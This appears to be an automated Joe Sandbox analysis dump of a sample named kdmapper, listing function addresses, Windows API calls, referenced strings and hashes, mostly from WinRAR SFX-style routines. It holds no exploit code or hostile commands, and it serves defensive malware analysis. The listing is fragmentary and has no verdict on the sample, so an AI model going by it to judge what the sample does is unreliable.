Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 062b6db372f5565239a98bd31ce2e80bd7116d082142d265e742cdee1ca4d90b
Instruction ID: 80e41094222c2a36d2708b917ffb3124de276dba8bf2e86c36f3acdd962367af
Opcode Fuzzy Hash: 062b6db372f5565239a98bd31ce2e80bd7116d082142d265e742cdee1ca4d90b
Instruction Fuzzy Hash: E5E0EC31942731BBD3615B71AC0EB8A3E56AB16F52F012301FA05AA2D0DBA48A008BA5

Function 0063D06A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 278COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 0063D11B

Strings

dc, xrefs: 0063D3C5
.lnk, xrefs: 0063D2F7, 0063D307

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: _wcschr
String ID: .lnk$dc
API String ID: 2691759472-1909988810
Opcode ID: 852d558af71a6ba6df5801e9ee1545325ceb2d138c053daca541ba174f9682f4
Instruction ID: 8b46d284c55de3d1fbdc919a018d7840b5ce1015f6c47af08e78e5f504ac17f9
Opcode Fuzzy Hash: 852d558af71a6ba6df5801e9ee1545325ceb2d138c053daca541ba174f9682f4
Instruction Fuzzy Hash: 71A171728002299ADF24DBA0DD45EFB73FEEF45304F0885A6B509E7141EE749B858FA4

Function 0064B1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0064B324

Part of subcall function 00649097: IsProcessorFeaturePresent.KERNEL32(00000017,00649086,00000050,00653A34,?,0062D710,00000004,00661030,?,?,00649093,00000000,00000000,00000000,00000000,00000000), ref: 00649099
Part of subcall function 00649097: GetCurrentProcess.KERNEL32(C0000417,00653A34,00000050,00661030), ref: 006490BB
Part of subcall function 00649097: TerminateProcess.KERNEL32(00000000), ref: 006490C2

Strings

., xrefs: 0064B4DB
*?, xrefs: 0064B1FB

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
Instruction ID: 9838825a44ab47aa2e55b00c221ff538507e48db1232743ee9616522c67d67df
Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
Instruction Fuzzy Hash: 66518E71E0020AAFDF15DFA9C881AEEBBB6EF58310F248169E854E7340E771DA018B50

Function 006275DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 006275E3

Part of subcall function 006305DA: _wcslen.LIBCMT ref: 006305E0

Part of subcall function 0062A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0062A598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0062777F

Part of subcall function 0062A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0062A325,?,?,?,0062A175,?,00000001,00000000,?,?), ref: 0062A501
Part of subcall function 0062A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0062A325,?,?,?,0062A175,?,00000001,00000000,?,?), ref: 0062A532

Strings

:, xrefs: 00627654

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: d66017bd48cd029954cde4b8af197923fae82d0d38d1d951d694ea23f407ebec
Instruction ID: f386e7f821b3d76a7b009d195370b4e7c1152ffbd615d47f5bb7df3c736e563f
Opcode Fuzzy Hash: d66017bd48cd029954cde4b8af197923fae82d0d38d1d951d694ea23f407ebec
Instruction Fuzzy Hash: 8B41B471800A78AAEB21EB64EC55EDEB37EAF41300F00409AB605A3192DB745F89CF75

Function 0062B37A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 0062B438
_wcschr.LIBVCRUNTIME ref: 0062B478

Strings

*, xrefs: 0062B38A

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: _wcschr
String ID: *
API String ID: 2691759472-163128923
Opcode ID: 37d7f4cbe04ff06870923f808a55b193d737051a3792cc0975965ef22fde4063
Instruction ID: 869c4043cda93f8773304b70659eedaddcf002af8c17814c03183491f3168d42
Opcode Fuzzy Hash: 37d7f4cbe04ff06870923f808a55b193d737051a3792cc0975965ef22fde4063
Instruction Fuzzy Hash: E0316822504F319A8B30FE04B8826BB73E7DFA1B10F14A01EFD8447287E7618D469F22

Function 0063B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0063B4E3
_wcslen.LIBCMT ref: 0063B4FE

Strings

}, xrefs: 0063B4D6

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: 32e2a4d2907437d84ffa25d36cb4651d7850908ec33a5e8d287c99836751ea59
Instruction ID: 6c29c92547f73e12732bb6fdff312070ca2f54685586daf85fff8de07263823b
Opcode Fuzzy Hash: 32e2a4d2907437d84ffa25d36cb4651d7850908ec33a5e8d287c99836751ea59
Instruction Fuzzy Hash: 5621D1729053165ADB31EE64D845BAEB3DEDF81760F04142EF680C7242EB65DD4883EA

Function 0062F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0062F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0062F2E4
Part of subcall function 0062F2C5: GetProcAddress.KERNEL32(006681C8,CryptUnprotectMemory), ref: 0062F2F4

GetCurrentProcessId.KERNEL32(?,?,?,0062F33E), ref: 0062F3D2

Strings

CryptUnprotectMemory failed, xrefs: 0062F3CA
CryptProtectMemory failed, xrefs: 0062F389

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 5648e73d0b5a6886992a21925c92dc45333f770fee8978748d358651736f248b
Instruction ID: 3668f6d5fbcc0d2f7f4a510470ca1be62bca5c8da3399283468b450e0c494845
Opcode Fuzzy Hash: 5648e73d0b5a6886992a21925c92dc45333f770fee8978748d358651736f248b
Instruction Fuzzy Hash: 9E11A231601A39ABDF15EF30E8456AE3B67AF05B60B144239FC415B391DA749E018FD5

Function 0063101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,00631160,?,00000000,00000000), ref: 00631043
SetThreadPriority.KERNEL32(?,00000000), ref: 0063108A

Part of subcall function 00626C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00626C54

Part of subcall function 00626DCB: _wcschr.LIBVCRUNTIME ref: 00626E0A
Part of subcall function 00626DCB: _wcschr.LIBVCRUNTIME ref: 00626E19

Strings

CreateThread failed, xrefs: 0063104F

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2706921342-3849766595
Opcode ID: 938a71ed9ef4fde0ea0c6de96f7d28b28a0a7968ad593d9c9a6b294ac4e8f9a1
Instruction ID: 348f9a32504705426a809580f116707cfecf74bceaf8b6df2efacb19be2f3e3d
Opcode Fuzzy Hash: 938a71ed9ef4fde0ea0c6de96f7d28b28a0a7968ad593d9c9a6b294ac4e8f9a1
Instruction Fuzzy Hash: CA012B753003096FD3346F24EC51BB6B35BEB41751F20042EF5465A2C0CFA068844764

Function 0062C058 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 0062C080

Strings

?*<>|", xrefs: 0062C06D, 0062C07F
<9e, xrefs: 0062C076

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: _wcschr
String ID: <9e$?*<>|"
API String ID: 2691759472-210875737
Opcode ID: 2e562c5ced7adaa82f7d270fad0adbe289eafd65b5f7a7f8f1210cc6531adb9f
Instruction ID: cbafdeb2325762512801a8cfc6ff1452389ba019439010de2fef75d1a98c28d1
Opcode Fuzzy Hash: 2e562c5ced7adaa82f7d270fad0adbe289eafd65b5f7a7f8f1210cc6531adb9f
Instruction Fuzzy Hash: 99F0F953544B22C1C7301F25780177AB3E7DF95B30F34441EE5C8873C2E5A388C08AA5

Function 0063DB4B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0063DBAC

Strings

Software\WinRAR SFX, xrefs: 0063DB95
c, xrefs: 0063DB9F

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: _wcslen
String ID: Software\WinRAR SFX$c
API String ID: 176396367-1845986509
Opcode ID: 723b70f0406bcf0dc5ae1a3655bc841fa71e7a393d7190261a6290db901b30bc
Instruction ID: ad7d2439ca9f152cd813bb830e5adfa5a5516c0496182cf3173f08cf589b909c
Opcode Fuzzy Hash: 723b70f0406bcf0dc5ae1a3655bc841fa71e7a393d7190261a6290db901b30bc
Instruction Fuzzy Hash: EB017171500128BADB219B95DC0AFDF7FBEEF05790F000056F54AA11A0DBB09A88CBE1

Function 0063AE2F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 0062C29A: _wcslen.LIBCMT ref: 0062C2A2

Part of subcall function 00631FDD: _wcslen.LIBCMT ref: 00631FE5
Part of subcall function 00631FDD: _wcslen.LIBCMT ref: 00631FF6
Part of subcall function 00631FDD: _wcslen.LIBCMT ref: 00632006
Part of subcall function 00631FDD: _wcslen.LIBCMT ref: 00632014
Part of subcall function 00631FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0062B371,?,?,00000000,?,?,?), ref: 0063202F

Part of subcall function 0063AC04: SetCurrentDirectoryW.KERNELBASE(?,0063AE72,C:\Users\user\Desktop,00000000,0066946A,00000006), ref: 0063AC08

_wcslen.LIBCMT ref: 0063AE8B

Strings

C:\Users\user\Desktop, xrefs: 0063AE68
<c, xrefs: 0063AEC4

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: _wcslen$CompareCurrentDirectoryString
String ID: <c$C:\Users\user\Desktop
API String ID: 521417927-688923738
Opcode ID: a39d4620f6d6eddc9033c995fa08212ac363e2a4b28bc2b030c436f1bcc1888f
Instruction ID: 80939d997398e46ef876be46d581097b8ed02e9c52b14fcfd37e2a8f0e60496d
Opcode Fuzzy Hash: a39d4620f6d6eddc9033c995fa08212ac363e2a4b28bc2b030c436f1bcc1888f
Instruction Fuzzy Hash: A7017171D40228A6DF50ABE4DD0AEDE77FEAF09700F000459F546E3191EAB49644CBE9

Function 0064BB4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006497E5: GetLastError.KERNEL32(?,00661030,00644674,00661030,?,?,00643F73,00000050,?,00661030,00000200), ref: 006497E9
Part of subcall function 006497E5: _free.LIBCMT ref: 0064981C
Part of subcall function 006497E5: SetLastError.KERNEL32(00000000,?,00661030,00000200), ref: 0064985D
Part of subcall function 006497E5: _abort.LIBCMT ref: 00649863

_abort.LIBCMT ref: 0064BB80
_free.LIBCMT ref: 0064BBB4

Strings

pe, xrefs: 0064BBAB

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: ErrorLast_abort_free
String ID: pe
API String ID: 289325740-324909747
Opcode ID: d17e8be7a46455546334f283c3bff20740e98a8b657413ea9b0309e68f0215e2
Instruction ID: ec7ab04b93cf55b21c470c93c004a3bd8db6d89d17771502269c116d0aab463b
Opcode Fuzzy Hash: d17e8be7a46455546334f283c3bff20740e98a8b657413ea9b0309e68f0215e2
Instruction Fuzzy Hash: C401A131D017229BCB66AF58D84269DB7A3FF04721F15110DE82467791CF65AD018BC5

Function 0063B425 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 0063B42F

Strings

(c, xrefs: 0063B457
Zc, xrefs: 0063B441

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: Malloc
String ID: (c$Zc
API String ID: 2696272793-3658583006
Opcode ID: 4f006bb08cd2eefbb98f2f3d271c7fcace1d8394f4424242d3f1a97fcdf1970a
Instruction ID: ae2d80263821d51e3c1add5ee7ac6502de9f8b117aafd73cf84a6733adccf97a
Opcode Fuzzy Hash: 4f006bb08cd2eefbb98f2f3d271c7fcace1d8394f4424242d3f1a97fcdf1970a
Instruction Fuzzy Hash: 62016D76640118FF9F059FB0DD49CEE7BAEEF04744B101155B906D7220E731AA44DBA0

Function 00648268 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 0064BF30: GetEnvironmentStringsW.KERNEL32 ref: 0064BF39
Part of subcall function 0064BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0064BF5C
Part of subcall function 0064BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0064BF82
Part of subcall function 0064BF30: _free.LIBCMT ref: 0064BF95
Part of subcall function 0064BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0064BFA4

_free.LIBCMT ref: 006482AE
_free.LIBCMT ref: 006482B5

Strings

0"h, xrefs: 0064829B

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
String ID: 0"h
API String ID: 400815659-1072796616
Opcode ID: 62dc4ef398ba86ecb5693e9da0487502d0b099c0a3321e23e761655b3b35e361
Instruction ID: 0ee2843622976cfb87555069a4d120a14ad68d17cf7b16fa776bbf7e4ee717f8
Opcode Fuzzy Hash: 62dc4ef398ba86ecb5693e9da0487502d0b099c0a3321e23e761655b3b35e361
Instruction Fuzzy Hash: E2E0E533A06D425993E136796C2666F0A438F81338B14131EF910871D3CE908A4305EA

Function 00630FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00631206,?), ref: 00630FEA
GetLastError.KERNEL32(?), ref: 00630FF6

Part of subcall function 00626C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00626C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00630FFF

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: c9cbce8b0086b176c739db700ca6f2b046689ebac3c8b5c66143ba8cf0f8c3c0
Instruction ID: 6aa1af1df631f5ca5c63a9d5b74970f7d0e01f0fa09305cb8cb466990bfa62c2
Opcode Fuzzy Hash: c9cbce8b0086b176c739db700ca6f2b046689ebac3c8b5c66143ba8cf0f8c3c0
Instruction Fuzzy Hash: 72D0C2316087302687103624AC068AE38078B12732F600718F038543E1CE1009915695

Function 0062E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,0062DA55,?), ref: 0062E2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,0062DA55,?), ref: 0062E2B1

Strings

RTL, xrefs: 0062E2AB

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: b15ea38a8cf665155f95a92655a598789b58e173eec65d20d67287e3dbf5b426
Instruction ID: 32a340f7f4ce5271036ce68820d78bfbe39d7adc7c4e50b734fb98d938653d01
Opcode Fuzzy Hash: b15ea38a8cf665155f95a92655a598789b58e173eec65d20d67287e3dbf5b426
Instruction Fuzzy Hash: 06C0123164173066E73097757C0DB87AA5A5B00F92F05145CB541E93D1D6A5C54486A0

Function 0063E470 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E467

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

pc, xrefs: 0063E470
zc, xrefs: 0063E461

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
